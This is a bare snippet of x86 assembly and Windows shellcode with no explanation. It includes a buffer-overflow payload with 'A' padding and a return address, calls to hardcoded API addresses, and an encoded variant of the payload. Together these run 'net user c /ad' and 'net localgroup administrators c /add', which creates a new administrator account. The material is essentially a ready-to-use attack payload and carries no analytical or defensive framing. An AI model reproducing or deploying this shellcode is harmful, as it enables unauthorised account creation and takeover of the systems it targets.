mov esp,ebp ;     
push ebp ;    
mov ebp,esp ;      
xor edi,edi ;
push edi ; 
push edi
push edi
push edi ;   
mov byte ptr [ebp-0Fh],6eh ;n
mov byte ptr [ebp-0eh],65h ;e 
mov byte ptr [ebp-0dh],74h ;t
mov byte ptr [ebp-0ch],20h ;
mov byte ptr [ebp-0bh],75h ;u
mov byte ptr [ebp-0ah],73h ;s
mov byte ptr [ebp-09h],65h ;e
mov byte ptr [ebp-08h],72h ;r
mov byte ptr [ebp-07h],20h ;
mov byte ptr [ebp-06h],63h ;c
mov byte ptr [ebp-05h],20h ;
mov byte ptr [ebp-04h],2Fh ;/
mov byte ptr [ebp-03h],61h ;a
mov byte ptr [ebp-02h],64h ;d
mov byte ptr [ebp-01h],0h ;0

lea eax,[ebp-0fh] ;
push eax ;              
mov eax, 0x77bf93c7 ;        
call eax ;                              

  "\x41\x41\x41\x41"
  "\x41\x41\x41\x41"
  "\x41\x41\x41\x41"
  "\x41\x41\x41\x41"
  "\x12\x45\xfa\x7f"
  "\x55" 
  "\x8B\xEC" 
  "\x33\xC0" 
  "\x50" 
  "\x50"  
  "\x50" 
  "\xC6\x45\xF5\x6D" 
  "\xC6\x45\xF6\x73" 
  "\xC6\x45\xF7\x76" 
  "\xC6\x45\xF8\x63" 
  "\xC6\x45\xF9\x72" 
  "\xC6\x45\xFA\x74" 
  “\xC6\x45\xFB\x2E" 
  "\xC6\x45\xFC\x64" 
  "\xC6\x45\xFD\x6C" 
  "\xC6\x45\xFE\x6C" 
  "\x8D\x45\xF5" 
  "\x50" 
  "\xB8\x7B\x1D\x80\x7C" 
  "\xFF\xD0"
  "\x8B\xE5"
  "\x55"
  "\x8B\xEC"
  "\x33\xFF"
  "\x57" 
  "\x57" 
  "\x57" 
  "\x57"  
  "\xC6\x45\xF1\x6E" 
  "\xC6\x45\xF2\x65" 
  "\xC6\x45\xF3\x74" 
  "\xC6\x45\xF4\x20" 
  "\xC6\x45\xF5\x75" 
  "\xC6\x45\xF6\x73" 
  "\xC6\x45\xF7\x65"  
  "\xC6\x45\xF8\x72" 
  "\xC6\x45\xF9\x20" 
  "\xC6\x45\xFA\x63" 
  "\xC6\x45\xFB\x20" 
  "\xC6\x45\xFC\x2F" 
  "\xC6\x45\xFD\x61" 
  "\xC6\x45\xFE\x64"  
  "\x8D\x45\xF1" 
  "\x50" 
  "\xB8\xC7\x93\xBF\x77" 
  "\xFF\xD0"
  "\x55"
  "\x8B\xEC"
  "\x33\xC0"
  "\x50"
  "\x68\x2F\x61\x64\x64" 
  "\x68\x73\x20\x63\x20" 
  "\x68\x61\x74\x6F\x72" 
  "\x68\x69\x73\x74\x72" 
  "\x68\x64\x6D\x69\x6E" 
  "\x68\x75\x70\x20\x61" 
  "\x68\x6C\x67\x72\x6F"   
  "\x68\x6C\x6F\x63\x61" 
  "\x68\x6E\x65\x74\x20" 
  "\x8D\x45\xD8"
  "\x50"  
  "\xB8\xC7\x93\xBF\x77" 
  "\xFF\xD0"
  
  
 \xd6\xd6\xd6\xd6\xd6\xd6\xd6\xd6\xd6\xd6\xd6\xd6\xd6\xd6\xd6\xd6\x85\xd2\x6d\xe8
\xc2\x1c\x7b\xa4\x57\xc7\xc7\xc7\x51\xd2\x62\xfa\x51\xd2\x61\xe4\x51\xd2\x60\xe1
\x51\xd2\x6f\xf4\x51\xd2\x6e\xe5\x51\xd2\x6d\xe3\x51\xd2\x6c\xb9\x51\xd2\x6b\xf3
\x51\xd2\x6a\xfb\x51\xd2\x69\xfb\x1a\xd2\x62\xc7\x2f\xec\x8a\x17\xeb\x68\x47\x1c
\x72\xc2\x1c\x7b\xa4\x68\xc0\xc0\xc0\xc0\x51\xd2\x66\xf9\x51\xd2\x65\xf2\x51\xd2
\x64\xe3\x51\xd2\x63\xb7\x51\xd2\x62\xe2\x51\xd2\x61\xe4\x51\xd2\x60\xf2\x51\xd2
\x6f\xe5\x51\xd2\x6e\xb7\x51\xd2\x6d\xf4\x51\xd2\x6c\xb7\x51\xd2\x6b\xb8\x51\xd2
\x6a\xf6\x51\xd2\x69\xf3\x1a\xd2\x66\xc7\x2f\x50\x4\x28\xe0\x68\x47\xc2\x1c\x7b\
xa4\x57\xc7\xff\xb8\xf6\xf3\xf3\xff\xe4\xb7\xf4\xb7\xff\xf6\xe3\xf8\xe5\xff\xfe\
xe4\xe3\xe5\xff\xf3\xfa\xfe\xf9\xff\xe2\xe7\xb7\xf6\xff\xfb\xf0\xe5\xf8\xff\xfb\
xf8\xf4\xf6\xff\xf9\xf2\xe3\xb7\x1a\xd2\x4f\xc7\x2f\x50\x4\x28\xe0\x68\x47